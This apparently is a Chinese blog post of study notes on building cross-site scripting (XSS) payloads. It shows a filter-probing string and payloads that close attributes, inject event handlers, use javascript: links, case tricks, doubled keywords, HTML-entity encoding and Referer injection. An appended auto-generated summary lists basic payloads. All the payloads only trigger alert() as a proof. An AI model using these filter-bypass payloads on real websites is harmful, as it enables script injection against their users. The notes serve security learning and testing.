xss构造

万能检测语句 <SCRscriptIPT>’”()Oonnjavascript,通过它我们可以知道过滤了那些东西。

"><script>alert(123)</script>//
有value时,把value里的内容用">给闭合,再把后面的>用//给注释掉

如果被转义了,无法闭合,就在input标签内添加一个事件,可选比如说onclick,onfocus等,再去把前面的内容闭合掉,把后面的内容注释掉

标签法:"><a href="javascript:alert('abc')">//

大小写法:"><SCRIPT>alert(123)</SCRIPT>

双写绕过:<SCRscriptIPT>alert(/pig/)</SCRscriptIPT>

转为html编码来绕过:java&#115;&#99;&#114;&#105;&#112;&#116;:alert(123)

-->对"和:符号也进行转html编码处理:java&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(&#34;http://")

把value值闭合,创建一个新的type值,再创建一个事件:t_sort="type="text"οnclick="alert(123)"

Referer值里进行修改:"type="text"οnclick="alert('abc')

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS漏洞是一种常见的网络安全漏洞,攻击者可以通过在网页中注入恶意的脚本代码来获取用户的敏感信息或者执行恶意操作。手工构造XSS payload是指攻击者通过编写特定的恶意代码来利用XSS漏洞。 在构造XSS payload,攻击者通常会利用一些特殊的字符或者代码来绕过网站的过滤机制,使恶意代码能够被执行。一些常见的XSS payload包括但不限于以下几种: 1. `<script>alert('XSS')</script>`:这是最简单的XSS payload,它会在网页中弹出一个提示框。 2. `<img src="x" onerror="alert('XSS')">`:这个payload利用了`<img>`标签的`onerror`事件,当图片加载失败会执行其中的代码。 3. `<svg/onload=alert('XSS')>`:这个payload利用了SVG标签的`onload`事件,当SVG图像加载完成会执行其中的代码。 4. `javascript:alert('XSS')`:这个payload利用了JavaScript伪协议,直接在URL中执行JavaScript代码。 需要注意的是,构造XSS payload是一种攻击行为,严禁利用这些技术进行非法攻击。本文提到的payload仅供学习和研究用途,请遵守法律法规,不要进行任何违法行为。 #### 引用[.reference_title] - *1* *2* *3* [反射型XSS、存储型XSS和DOM型XSS的简介及XSS常见payload构造及变形](https://blog.csdn.net/bwxzdjn/article/details/123645177)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值